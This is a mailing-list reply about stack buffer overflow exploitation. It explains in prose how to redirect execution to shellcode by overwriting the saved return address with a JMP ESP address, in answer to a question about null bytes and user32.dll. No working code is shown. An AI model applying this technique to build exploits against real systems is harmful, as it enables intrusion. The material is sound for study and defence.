Re: problem in rewrite RET address in Buffer OverFlow

[Gerry Eisenhaur <gerrye () gmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think you are a little confused. When exploiting a stack based buffer
overflow, one of the ways to control the process flow is overwriting the
 stored return address when an address that will get you back to your
shellcode.

The common example used when explaining this is that when the function
where the overflow occurs returns, there will be a register that points
to (or close to) your user controlled buffer. Say ESP points to the
buffer you control (your shellcode), You would overwrite the return
address with a JMP ESP, hence giving you control.

I hope this makes things a little clearer for you.

Gerry

Mani.682001 () gmail com wrote:
> hi list
> i Work for writing one local exploit so i want to rewrite RET address with EIP(some where My NOP and Shellcode is 
> there) but i have a problem in this.
> the EIP address is 002F77E1 if you pay some attension you can see first byte is "00" and if i put it in my String in 
> my exploit C/C++ think its end of String so what can i do? i ask this Question from my friend he answered use 
> User32.dll but i opened it by debugger and searched "jmp eip" i found some address without any 00 byte but it's not 
> work correctly my Question is what we use user32.dll and what does it do and is there any other DLL for jumping in 
> EIP address?

- --
Gerry Eisenhaur <gerrye gmail com>
PGP key:        0xB4A196698555EC78

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDXv46tKGWaYVV7HgRAjnJAJ47NrE6YuE8KrQ1U1qFwmPevx+AcwCbBgrQ
+Lkkowe7VEcWexAZ4EnAy6g=
=c8lZ
-----END PGP SIGNATURE-----